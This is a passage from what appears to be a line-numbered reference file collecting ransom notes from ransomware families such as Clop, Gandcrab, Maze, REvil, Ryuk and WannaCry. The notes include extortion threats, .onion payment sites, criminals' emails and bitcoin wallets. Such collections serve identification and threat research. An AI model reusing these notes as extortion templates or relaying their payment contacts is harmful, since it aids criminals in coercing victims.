| * Decryption of your files with the help of third parties may 103 | cause increased price (they add their fee to our) or you can 104 | become a victim of a scam. 105 | ``` 106 | 107 | ## Cerber 108 | ``` 109 | Your documents, photots, databases and other important files have been encrypted! 110 | To decrypt your files follow the instructions: 111 | 112 | 1. Download and install the from https://www.torproject.org/ 113 | 114 | 2. Run it 115 | 116 | 3. In the open website: 117 | http://decrypttozxybarc.onion/BFA2-3DEC-FB00-003F-302B 118 | 119 | 4. Follow the instructions at this website. 120 | ``` 121 | 122 | ## Chacha 123 | ``` 124 | ``` 125 | 126 | ## Clop 127 | ``` 128 | Your network has been penetrated. 129 | All files on each host in the network have been encrypted with a strong algorithm. 130 | Backups were either encrypted or deleted or backup disks were formatted. 131 | Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. 132 | We exclusively have decryption software for your situation 133 | No decryption software is available in the public. 134 | DO NOT RESET OR SHUTDOWN – files may be damaged. 135 | DO NOT RENAME OR MOVE the encrypted and readme files. 136 | DO NOT DELETE readme files. 137 | This may lead to the impossibility of recovery of the certain files. 138 | Photorec, RannohDecryptor etc. repair tools are useless and can destroy your files irreversibly. 139 | If you want to restore your files write to emails (contacts are at the bottom of the sheet) and attach 2-3 encrypted files 140 | (Less than 5 Mb each, non-archived and your files should not contain valuable information 141 | (Databases, backups, large excel sheets, etc.)). 142 | You will receive decrypted samples and our conditions how to get the decoder. 143 | 144 | Attention!!! 145 | Your warranty - decrypted samples. 146 | Do not rename encrypted files. 147 | Do not try to decrypt your data using third party software. 148 | We don`t need your files and your information. 149 | 150 | But after 2 weeks all your files and keys will be deleted automatically. 151 | Contact emails: 152 | servicedigilogos@protonmail.com 153 | or 154 | managersmaers@tutanota.com 155 | 156 | The final price depends on how fast you write to us. 157 | 158 | Clop 159 | ``` 160 | 161 | ## CryptXXX 162 | ``` 163 | ``` 164 | 165 | ## DeathRansom \ Wacatac 166 | Filename: `read_me.txt` 167 | ``` 168 | ????????????????????????? 169 | ??????DEATHRansom ??????? 170 | ????????????????????????? 171 | Hello dear friend, 172 | Your files were encrypted! 173 | You have only 12 hours to decrypt it 174 | In case of no answer our team will delete your decryption password 175 | Write back to our e-mail: deathransom@airmail.cc 176 | 177 | 178 | In your message you have to write: 179 | 1. YOU LOCK-ID: %s 180 | 2. Time when you have paid 0.1 btc to this bitcoin wallet: 181 | 1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N 182 | 183 | 184 | After payment our team will decrypt your files immediatly 185 | 186 | 187 | Free decryption as guarantee: 188 | 1. File must be less than 1MB 189 | 2. Only .txt or .lnk files, no databases 190 | 3. Only 1 files 191 | 192 | 193 | How to obtain bitcoin: 194 | The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment 195 | method and price. 196 | https://localbitcoins.com/buy_bitcoins 197 | Also you can find other places to buy Bitcoins and beginners guide here: 198 | http://www.coindesk.com/information/how-can-i-buy-bitcoins/ 199 | ``` 200 | 201 | ## Dharma 202 | Filename: `Info.hta` 203 | ``` 204 | All your files have been encrypted! 205 | All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail admin@sectex.net 206 | Write this ID in the title of your message EA0599F6 207 | In case of no answer in 24 hours write us to theese e-mails:admin@sectex.world 208 | You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. 209 | Free decryption as guarantee 210 | Before paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) 211 | How to obtain Bitcoins 212 | The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. 213 | https://localbitcoins.com/buy_bitcoins 214 | Also you can find other places to buy Bitcoins and beginners guide here: 215 | http://www.coindesk.com/information/how-can-i-buy-bitcoins/ 216 | Attention! 217 | Do not rename encrypted files. 218 | Do not try to decrypt your data using third party software, it may cause permanent data loss. 219 | Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 220 | ``` 221 | 222 | ## Gandcrab 223 | Filename: `YYLIOZIDKW-MANUAL.txt` 224 | ``` 225 | ---= GANDCRAB V5.2 =--- 226 | 227 | ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED*********************** 228 | 229 | *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS***** 230 | 231 | Attention! 232 | 233 | All your files, documents, photos, databases and other important files are encrypted and have the extension: .YYLIOZIDKW 234 | 235 | The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. 236 | 237 | 238 | The server with your key is in a closed network TOR. You can get there by the following ways: 239 | 240 | ---------------------------------------------------------------------------------------- 241 | 242 | | 0. Download Tor browser - https://www.torproject.org/ 243 | 244 | | 1. Install Tor browser 245 | | 2. Open Tor Browser 246 | | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/b6314679c4ba3647 247 | | 4. Follow the instructions on this page 248 | 249 | ---------------------------------------------------------------------------------------- 250 | 251 | 252 | On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. 253 | 254 | 255 | ATTENTION! 256 | 257 | IN ORDER TO PREVENT DATA DAMAGE: 258 | 259 | * DO NOT MODIFY ENCRYPTED FILES 260 | * DO NOT CHANGE DATA BELOW 261 | 262 | ---BEGIN GANDCRAB KEY--- 263 | %base64_key% 264 | ---END GANDCRAB KEY--- 265 | 266 | ---BEGIN PC DATA--- 267 | %base64_data% 268 | ---END PC DATA--- 269 | ``` 270 | 271 | ## Jigsaw 272 | ``` 273 | ``` 274 | 275 | ## Lockergoga 276 | Filename: `README_LOCKED.txt` 277 | ``` 278 | Greetings! 279 | 280 | There was a significant flaw in the security system of your company. 281 | You should be thankful that the flaw was exploited by serious people and not some rookies. 282 | They would have damaged all of your data by mistake or for fun. 283 | 284 | Your files are encrypted with the strongest military algorithms RSA4096 and AES-256. 285 | Without our special decoder it is impossible to restore the data. 286 | Attempts to restore your data with third party software as Photorec, RannohDecryptor etc. 287 | will lead to irreversible destruction of your data. 288 | 289 | To confirm our honest intentions. 290 | Send us 2-3 different random files and you will get them decrypted. 291 | It can be from different computers on your network to be sure that our decoder decrypts everything. 292 | Sample files we unlock for free (files should not be related to any kind of backups). 293 | 294 | We exclusively have decryption software for your situation 295 | 296 | DO NOT RESET OR SHUTDOWN - files may be damaged. 297 | DO NOT RENAME the encrypted files. 298 | DO NOT MOVE the encrypted files. 299 | This may lead to the impossibility of recovery of the certain files. 300 | 301 | The payment has to be made in Bitcoins. 302 | The final price depends on how fast you contact us. 303 | As soon as we receive the payment you will get the decryption tool and 304 | instructions on how to improve your systems security 305 | 306 | To get information on the price of the decoder contact us at: 307 | 308 | DharmaParrack@protonmail.com 309 | wyattpettigrew8922555@mail.com 310 | ``` 311 | 312 | ## Locky 313 | ``` 314 | !!! IMPORTANT INFORMATION !!! 315 | 316 | All of your files are encrypted with RSA-2048 and AES-128 ciphers. 317 | More information about the RSA and AES can be found here: 318 | 319 | Decrypting of your files is only possible with private key and decrypt program, which is on our secret server. 320 | To receive your private key follow one of the links: 321 | 322 | If all of this addresses are not available, follow these steps: 323 | 324 | !!! Your personal identification ID: %key% !!! 325 | ``` 326 | 327 | ## Mamo434376 328 | ``` 329 | Merhaba! 330 | 331 | Sisteminizde önemli gördüğümüz datalarınızı şifreledik. Bilindik veri kurtarma yöntemleri ile verilerinizi geri getiremeyeceğinizi - 332 | bilmenizi isteriz. 333 | Bu yöntemler sadece sizin zaman kaybetmenize sebep olacaktır. 334 | Yinede veri kurtarma firmaları yada programları kullanmak isterseniz lütfen asıl dosyalarınız üzerinde değil, 335 | bunların kopyaları üzerinde işlem yapınız ve/veya yaptırınız. 336 | Asıl dosyaların bozulması verilerinizin geri dönülmez şekilde zarar görmesine sebep olabilir. 337 | Sifrelenen dosyalarınızın asılları, üzerinde rast gele veri yazma tekniğini kullanarak silinmiştir. 338 | 339 | 2 gün içerisinde dönüş yapılmadığı taktirde, sisteminizde kullanılan şifre silinecektir ve verileriniz asla geri döndürülmiyecektir. 340 | 341 | Diskleriniz Full disk encryption ile şifrelenmiştir yetkisiz müdahale kalici veri kaybına neden olur! 342 | 343 | Para verseniz daha açmazlar diyen bilgisayarcılara veya paranı alır dosyalarını vermez diyen - 344 | etrafınızdaki insanlara inanmayın. 345 | Size güven verecek kadar yeterli referansa sahibim. 346 | 347 | Sizi tanımıyorum, dolaysıyla ile size karşı kötü duygular beslemenin size kötülük yapmanın bir anlamı"da yok, 348 | amacım sadece bu işten bir gelir elde etmek. 349 | Ödeme Bitcoin ile yapılmaktadır. 350 | Bitcoin ne olduğunu buradan öğrenebilirsiniz : https://simple.wikipedia.org/wiki/Bitcoin 351 | Yaptığınız ödeme sonrasında, en kısa zamanda verilerinizi eski haline döndürmek için size özel bir şifre çözücü yapacağım - 352 | ve mail yoluyla size göndereceğim, ama tabi bunun için mail yoluyla bizimle iletişime geçmeniz ve bize ID"nizi göndermeniz gerekir. 353 | 354 | Şifre çözme aracının fiyatı 300 dolar. 355 | 24 saat içerisinde dönüş yaparsanız size %50 indirim yapacağım. 356 | 357 | Ödemeyi yapmak ve verilerinizin şifresini çözdürmek için aşağıdaki iletişim kanalından bizimle iletişime geçebilirsiniz. 358 | 359 | Ulaşmak istediğinizde mutlaka aşağıda size özel üretilen ID"yi eklemeyi unutmayınız. 360 | 361 | SITE_CODE: 362 | ID: XXXXXXXXXX 363 | E-Mail: yardimail1@aol.com 364 | ``` 365 | 366 | ## Maze 367 | Filename: `DECRYPT-FILES.txt` 368 | ``` 369 | Attention! 370 | ---------------------------- 371 | | What happened? 372 | ---------------------------- 373 | All your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms. 374 | You cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps. 375 | ---------------------------- 376 | | How to get my files back? 377 | ---------------------------- 378 | The only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. 379 | To contact us and purchase the key you have to visit our website in a hidden TOR network. 380 | There are general 2 ways to reach us: 381 | 1) [Recommended] Using hidden TOR network. 382 | a) Download a special TOR browser: https://www.torproject.org/ 383 | b) Install the TOR Browser. 384 | c) Open the TOR Browser. 385 | d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/%USERID% 386 | e) Follow the instructions on this page. 387 | 2) If you have any problems connecting or using TOR network 388 | a) Open our website: https://mazedecrypt.top/%USERID% 389 | b) Follow the instructions on this page. 390 | Warning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. 391 | On this page, you will see instructions on how to make a free decryption test and how to pay. 392 | Also it has a live chat with our operators and support team. 393 | ---------------------------- 394 | | What about guarantees? 395 | ---------------------------- 396 | We understand your stress and worry. 397 | So you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer! 398 | If you have any problems our friendly support team is always here to assist you in a live chat! 399 | ------------------------------------------------------------------------------- 400 | THIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU 401 | ---BEGIN MAZE KEY--- 402 | %base64key% 403 | ---END MAZE KEY--- 404 | ``` 405 | 406 | ## Megacortex 407 | ``` 408 | ``` 409 | 410 | ## Mircop 411 | ``` 412 | Hello, 413 | 414 | You've stolen 48.48 BTC from the wrong people, please be 415 | so kind to return them and we will return your files... 416 | 417 | Don't take us for fools, we know more about you than 418 | you know about yourself. 419 | 420 | Pay us back and we won't take further action, don't pay 421 | and be prepared. 422 | 423 | 3BGrRU4mhAkCFx1s3Z4yQLCbNg29wtBFj8 424 | ``` 425 | 426 | ## Nemty 427 | ``` 428 | ---=== NEMTY PROJECT ===--- 429 | [+] Whats Happen? [+] 430 | Your files are encrypted, and currently unavailable. You can check it: all files on you computer has extension .nemty 431 | By the way, everything is possible to restore, but you need to follow our instructions. Otherwise, you cant return your data (NEVER). 432 | [+] What guarantees? [+] 433 | It's just a business. We absolutely do not care about you and your deals, except getting benefits. 434 | If we do not do our work and liabilities - nobody will not cooperate with us. 435 | It's not in our interests. 436 | If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. 437 | In practise - time is much more valuable than money. 438 | [+] How to get access on website? [+] 439 | 1) Download and install TOR browser from this site: https://torproject.org/ 440 | 2) Open our website: zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion/pay 441 | When you open our website, follow the instructions and you will get your files back. 442 | Configuration file path: C:\Users\admin 443 | ``` 444 | 445 | ## PureLocker 446 | Filename: `YOUR_FILES.txt` 447 | ``` 448 | #CR1 449 | All your files have been encrypted using: AES-256-CBC + RSA-4096. 450 | Shadows copies were removed, original files were overwritten, renamed and deleted using safe methods. 451 | Recovery is not possible without own RSA-4096 private key. 452 | Only we can decrypt your files! 453 | To decrypt your files contact us at: cr1-silvergold1@protonmail.com 454 | Your private key will be deleted after 7 days starting from: 15/10/2019, after that the recovery of your files will not be possible. 455 | ``` 456 | 457 | ## Revil (Sodinokibi) 458 | Filename: `kd2p9-readme.txt` 459 | ``` 460 | ---=== Welcome. Again. ===--- 461 | 462 | [+] Whats Happen? [+] 463 | 464 | Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion kd2p9. 465 | By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). 466 | 467 | [+] What guarantees? [+] 468 | 469 | Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. 470 | To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. 471 | If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. 472 | 473 | [+] How to get access on website? [+] 474 | 475 | You have two ways: 476 | 477 | 1) [Recommended] Using a TOR browser! 478 | a) Download and install TOR browser from this site: https://torproject.org/ 479 | b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C2D97495C4BA3647 480 | 481 | 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: 482 | a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) 483 | b) Open our secondary website: http://decryptor.top/C2D97495C4BA3647 484 | 485 | Warning: secondary website can be blocked, thats why first variant much better and more available. 486 | 487 | When you open our website, put the following data in the input form: 488 | Key: 489 | 490 | %base64_key% 491 | 492 | 493 | 494 | Extension name: 495 | 496 | kd2p9 497 | 498 | ----------------------------------------------------------------------------------------- 499 | 500 | !!! DANGER !!! 501 | DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. 502 | !!! !!! !!! 503 | ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. 504 | !!! !!! !!! 505 | ``` 506 | 507 | ## Robbinhood 508 | ``` 509 | ``` 510 | 511 | ## Ryuk 512 | Filename: `RyukReadMe.txt` 513 | ``` 514 | Your network has been penetrated. 515 | 516 | All files on each host in the network have been encrypted with a strong algorithm. 517 | 518 | Backups were either encrypted or deleted or backup disks were formatted. 519 | Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. 520 | 521 | We exclusively have decryption software for your situation 522 | No decryption software is available in the public. 523 | 524 | DO NOT RESET OR SHUTDOWN - files may be damaged. 525 | DO NOT RENAME OR MOVE the encrypted and readme files. 526 | DO NOT DELETE readme files. 527 | This may lead to the impossibility of recovery of the certain files. 528 | 529 | To get info (decrypt your files) contact us at 530 | WayneEvenson@protonmail.com 531 | or 532 | WayneEvenson@tutanota.com 533 | 534 | BTC wallet: 535 | 14hVKm7Ft2rxDBFTNkkRC3kGstMGp2A4hk 536 | 537 | Ryuk 538 | 539 | No system is safe 540 | ``` 541 | 542 | ## Samsam 543 | ``` 544 | ``` 545 | 546 | ## Snake / Ekans 547 | ``` 548 | -------------------------------------------- 549 | | What happened to your files? 550 | -------------------------------------------- 551 | 552 | We breached your corporate network and encrypted the data on your computers. The encrypted data includes documents, databases, photos and more - all were encrypted using a military grade encryption algorithms (AES-256 and RSA-2048). You cannot access those files right now. But dont worry! 553 | 554 | You can still get those files back and be up and running again in no time. 555 | 556 | --------------------------------------------- 557 | | How to contact us to get your files back? 558 | --------------------------------------------- 559 | 560 | The only way to restore your files is by purchasing a decryption tool loaded with a private key we created specifically for your network. 561 | 562 | Once run on an effected computer, the tool will decrypt all encrypted files - and you can resume day-to-day operations, preferably with better cyber security in mind. If you are interested in purchasing the decryption tool contact us at bapcocrypt@ctemplar.com 563 | 564 | ------------------------------------------------------- 565 | | How can you be certain we have the decryption tool? 566 | ------------------------------------------------------- 567 | 568 | In your mail to us attach up to 3 files (up to 3MB, no databases or spreadsheets). 569 | 570 | We will send them back to you decrypted. 571 | ``` 572 | 573 | ## Snatch 574 | #1 Filename: `Readme_Restore_Files.txt` 575 | ``` 576 | All your files are encrypted 577 | Do not try modify files 578 | My email imBoristheBlade@protonmail.com 579 | ``` 580 | 581 | #2 Filename: `RESTORE_DGLNL_FILES.txt` 582 | ``` 583 | Your all your files are encrypted and only I can decrypt them. 584 | Contact me: 585 | doctor666@mail.fr or doctor666@cock.li 586 | Write me if you want to return your files - I can do it very quickly 587 | The header of the letter must contain the extension of the encryptor. 588 | Attention 589 | Do not rename encrypted files. You may have permanent data loss. 590 | To prove that I can recover your files, I am ready to decrypt any three files (less than 1Mb) for free (except databases, Excel and backups) 591 | hurry up 592 | If you do not email me in the next 48 hours then your data may be lost permanently 593 | ``` 594 | 595 | ## Vegalocker 596 | ``` 597 | ``` 598 | 599 | ## Wannacry 600 | Filename: `@Please_Read_Me@.txt` 601 | ``` 602 | Q: What's wrong with my files? 603 | 604 | A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. 605 | If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! 606 | Let's start decrypting! 607 | 608 | Q: What do I do? 609 | 610 | A: First, you need to pay service fees for the decryption. 611 | Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw 612 | 613 | Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software. 614 | Run and follow the instructions! (You may need to disable your antivirus for a while.) 615 | 616 | Q: How can I trust? 617 | 618 | A: Don't worry about decryption. 619 | We will decrypt your files surely because nobody will trust us if we cheat users. 620 | 621 | 622 | * If you need our assistance, send a message by clicking on the decryptor window. 623 | ``` 624 | --------------------------------------------------------------------------------